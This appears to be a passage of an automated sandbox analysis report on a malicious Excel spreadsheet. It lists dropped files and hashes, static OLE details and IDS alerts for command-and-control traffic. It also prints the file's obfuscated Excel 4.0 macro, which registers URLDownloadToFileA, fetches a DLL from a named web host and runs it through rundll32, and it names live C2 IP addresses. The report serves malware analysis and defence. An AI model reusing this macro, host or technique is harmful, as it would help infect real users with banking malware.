                                                                                                                                                                                            Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Cab20E9.tmp
                                                                                                                                                                                            Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):59134
                                                                                                                                                                                            Entropy (8bit):7.995450161616763
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Tar20EA.tmp
                                                                                                                                                                                            Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):152788
                                                                                                                                                                                            Entropy (8bit):6.316654432555028
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                                                                                                                            MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                                                                                                                            SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                                                                                                                            SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                                                                                                                            SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 10:16:34 2021, atime=Sat Feb 20 10:16:34 2021, length=16384, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):867
                                                                                                                                                                                            Entropy (8bit):4.495155303444507
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:85Q+pgLgXg/XAlCPCHaXSzB8aB/OxJX+WnicvbLbDtZ3YilMMEpxRljKrcCTdJP8:85jk/XTK6aEJYe7Dv3qSnrNru/
                                                                                                                                                                                            MD5:6AD8E80E987BF8C934BD3809D8B2B24A
                                                                                                                                                                                            SHA1:6E7E22616035724B1F851AFD0DB24BF745C1A49D
                                                                                                                                                                                            SHA-256:A48DD1DA24A3FFD1E5FF10E8314D8FB031D4741E37E22FD8297E4F440144FE54
                                                                                                                                                                                            SHA-512:F8BD2A5C8116945136D106753122AABC98EF29877E246A2CDC4FECDE777DEDEC2AF167DB6FF6BB86C53ACD56359B29AAFDF95851D1DCC39C612C2F94AA31F976
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview: L..................F...........7G...*..y....*..y....@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.Z..Desktop.d......QK.XTR.Z*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......320946..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.13127.LNK
                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 20 10:16:21 2021, mtime=Sat Feb 20 10:16:34 2021, atime=Sat Feb 20 10:16:34 2021, length=168448, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2368
                                                                                                                                                                                            Entropy (8bit):4.581927649821565
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:8BN/XTZaiHCqQFHCCWQh2BN/XTZaiHCqQFHCCWQ/:8BN/X1aiiyCWQh2BN/X1aiiyCWQ/
                                                                                                                                                                                            MD5:6463D8D40C4CE9238290D3D9B27C30F2
                                                                                                                                                                                            SHA1:5DB759C84513B007B87571B18FAEC5140DA23B9C
                                                                                                                                                                                            SHA-256:16E680D0309BC36471D6668FC9142E40093A5879F6EDD687A1F3AB88B07D4412
                                                                                                                                                                                            SHA-512:8B5622C40D905FE466777FCD5A61C9F3BBD8C563A969DE585EFC0B41BD00260C7FD8A340E47AB7A754CFFF8010129379DCB1D15611F29C444E179E9812329D7D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: L..................F.... .....i.y....*..y....N..y................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TR.Z..Desktop.d......QK.XTR.Z*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TR.Z .SECURI~1.XLS.........TR.ZTR.Z*..."&....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.3.1.2.7...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls.G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.3.1.2.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                            Entropy (8bit):4.864166697857585
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:oyBVomM0bcsoMW3k2uscbcsoMW3k2mM0bcsoMW3k2v:dj60wsoMW0nwsoMW0o0wsoMW0I
                                                                                                                                                                                            MD5:C69269D3656A2431308C88DEF4D4F13F
                                                                                                                                                                                            SHA1:F674A7D59F59141335B18F2B639B47DBCE39B7A9
                                                                                                                                                                                            SHA-256:EE99BFC929243FB6DE7456053F6298AF672490869E31DB431EBC927E07483DD2
                                                                                                                                                                                            SHA-512:15C6248901F8FDF3DFD060938B7E70AD372878E99DB616F33129A788004190E3F6AA10D7CF5810F57798A09980A61017191F1606D304B719826EE4A6741AAA63
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.13127.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.13127.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.13127.LNK=0..
                                                                                                                                                                                            C:\Users\user\BASE.BABAA
                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4591104
                                                                                                                                                                                            Entropy (8bit):5.0540147937501265
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                                            MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                                            SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                                            SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                                            SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 11%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Sign-979329054_1327186231.xls, Detection: malicious, Browse
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\Desktop\AEBE0000
                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):177025
                                                                                                                                                                                            Entropy (8bit):7.2399467144037395
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnM:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKI
                                                                                                                                                                                            MD5:E48CD2A56FE62C58737B52EADBA85D78
                                                                                                                                                                                            SHA1:B43686D2ADBFBE3F46F740B3EE2E5B9C64634041
                                                                                                                                                                                            SHA-256:3152805E9D9C73AD3F4697857DD09D126EFDC3BF9B81C57C2BC385F741495172
                                                                                                                                                                                            SHA-512:449E2593CDAD3C634F41E0FD35465EF74FD7B2FB2BC5885CDEC7CDA6929E2DEE0FCF43610DB04515B4EC8416D8142CCEA693ED5731971991CEE2CF62D01FF77B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
                                                                                                                                                                                            Entropy (8bit):7.195176543915214
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                            File name:SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls
                                                                                                                                                                                            File size:168960
                                                                                                                                                                                            MD5:31964397103260697c37ee4237194da9
                                                                                                                                                                                            SHA1:7c2dc1c68e4aeff9adef87c3ddfc53592c2b2c94
                                                                                                                                                                                            SHA256:12956825df5f2b791e53c1a2ab9d7afbd8e59411b01f61a1f78ef6c5770c3ef4
                                                                                                                                                                                            SHA512:0440996111d6eada8a6f1389d0658adcc291b2d1000b5f47c83cc3c03673f4e4cc89ff9d21a3b7ad02b13e208241ff0432286201f254d15b1167fdbbf074c352
                                                                                                                                                                                            SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMD:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKe
                                                                                                                                                                                            File Content Preview:........................>.......................H...........................E...F...G..........................................................................................................................................................................

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:e4eea286a4b4bcb4

                                                                                                                                                                                            Static OLE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Document Type:OLE
                                                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                                                            OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls"

                                                                                                                                                                                            Indicators

                                                                                                                                                                                            Has Summary Info:True
                                                                                                                                                                                            Application Name:Microsoft Excel
                                                                                                                                                                                            Encrypted Document:False
                                                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                                                            Flash Objects Count:
                                                                                                                                                                                            Contains VBA Macros:True

                                                                                                                                                                                            Summary

                                                                                                                                                                                            Code Page:1251
                                                                                                                                                                                            Author:
                                                                                                                                                                                            Last Saved By:
                                                                                                                                                                                            Create Time:2006-09-16 00:00:00
                                                                                                                                                                                            Last Saved Time:2021-02-19 10:48:36
                                                                                                                                                                                            Creating Application:Microsoft Excel
                                                                                                                                                                                            Security:0

                                                                                                                                                                                            Document Summary

                                                                                                                                                                                            Document Code Page:1251
                                                                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                                                                            Contains Dirty Links:False
                                                                                                                                                                                            Shared Document:False
                                                                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                                                                            Application Version:917504

                                                                                                                                                                                            Streams

                                                                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Stream Size:4096
                                                                                                                                                                                            Entropy:0.357299206868
                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Stream Size:4096
                                                                                                                                                                                            Entropy:0.247217286775
                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
                                                                                                                                                                                            General
                                                                                                                                                                                            Stream Path:Workbook
                                                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                            Stream Size:157800
                                                                                                                                                                                            Entropy:7.46869820242
                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                            Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                            Macro 4.0 Code

                                                                                                                                                                                            ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
                                                                                                                                                                                            "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                            02/20/21-03:17:14.088896TCP2404306ET CNC Feodo Tracker Reported CnC Server TCP group 449166443192.168.2.22142.202.191.164
                                                                                                                                                                                            02/20/21-03:17:16.980781TCP2404302ET CNC Feodo Tracker Reported CnC Server TCP group 249168443192.168.2.22108.170.20.75
                                                                                                                                                                                            02/20/21-03:18:00.666014TCP2404324ET CNC Feodo Tracker Reported CnC Server TCP group 1349170443192.168.2.22200.52.147.93
                                                                                                                                                                                            02/20/21-03:19:11.713314TCP2404316ET CNC Feodo Tracker Reported CnC Server TCP group 949171443192.168.2.22186.137.85.76

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Feb 20, 2021 03:17:03.575388908 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.632915020 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.633085966 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.634332895 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.691679001 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.699875116 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.699927092 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.699975967 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700018883 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700040102 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700057983 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700098991 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700103045 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700134039 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                                            Feb 20, 2021 03:17:03.700139046 CET8049165185.81.0.78192.168.2.22
